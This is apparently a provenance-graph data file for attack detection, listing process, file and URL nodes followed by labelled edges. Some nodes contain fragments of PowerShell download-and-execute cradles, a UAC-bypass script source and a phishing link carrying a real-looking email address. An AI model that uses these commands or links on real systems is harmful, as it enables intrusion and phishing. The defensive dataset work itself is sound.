29
MP*-cipher.exe
MF-C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log
MF-C:\Windows\Microsoft
SF-C:\Users\admin\AppData\Local\Temp\c2dbd1f560dba5050031499cc921b3b7
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute
TP*-cipher.exe
MF-postgres.exe
MF-C:\Windows\servicing\TrustedInstaller
MP-360TS_Setup.exe
MP-D18C.exe
SO-http://go.microsoft.com/fwlink/?LinkId=57426&Ext=jsp
SF-C:\Windows\system32\prevhost.exe
MF-C:\Users\admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup
TP*-audiodg.exe 
MP-icacls.exe
SF-C:\windows\system32\cmd
SO-http://www.suzhouca.com/upload/admin/20220826/fbee9953d4
MP-Enquiry No. 1000341492.exe 
SO-https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1
MF-.\T1218\bin\calc.dll
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-\Windows\system32\vssvc.exe
MF-C:\Users\admin\AppData\Local\Temp\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
MP-crypted.exe 
SF-C:\Windows\system32\icacls.exe
SO-https://nam10.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.masjidinthepark.org%2FSUNAT%2Ffactura%2F%3Fhash%3Dmwatanabe%40bcp.com.pe&data=05%7C01%7Cmwatanabe%40bcp.com.pe%7Cca75025415994757b07908db937289ac%7C5d93ebccf76943808b7e289fc972da1b%7C0%7C1%7C638265892397682484%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000%7C%7C%7C&sdata=E9tzPdJ5l%2F8GHfQ6zInN3Y%2BzJdJdsHKozuVHlD1dIzM%3D&reserved=0
MP-vssvc.exe
TF-AnyDesk.exe
MP*-PsExec.exe
81
0 1 RD
0 2 EX
0 3 WR
4 0 RF
0 5 IJ
5 1 RD
5 2 WR
5 3 WR
5 4 ST
0 6 WR
5 6 RD
0 7 EX
5 7 WR
0 8 FR
8 1 WR
8 2 WR
8 3 WR
8 4 ST
5 8 IJ
8 6 RD
8 7 WR
0 9 FR
9 1 RD
9 2 EX
9 3 WR
4 9 RF
5 9 UK
10 0 RF
8 10 ST
8 11 RD
8 12 EX
13 3 WR
13 4 ST
13 6 RD
13 7 WR
8 13 IJ
10 13 RF
13 11 WR
13 12 CD
14 4 ST
14 6 RD
14 7 WR
8 14 UK
13 15 WR
16 13 RF
17 7 WR
10 17 RF
17 11 EX
17 12 WR
13 17 IJ
17 15 RD
17 16 ST
18 13 RF
18 17 RF
13 19 RD
17 19 WR
20 13 RF
17 20 ST
13 21 CD
17 21 WR
13 22 WR
17 22 WR
13 23 FR
23 15 WR
16 23 RF
18 23 RF
23 19 CD
23 20 ST
23 21 EX
23 22 WR
17 24 WR
23 24 WR
17 25 ST
23 25 ST
17 26 UK
23 27 WR
28 19 WR
20 28 RF
28 21 EX
28 22 WR
23 28 UK

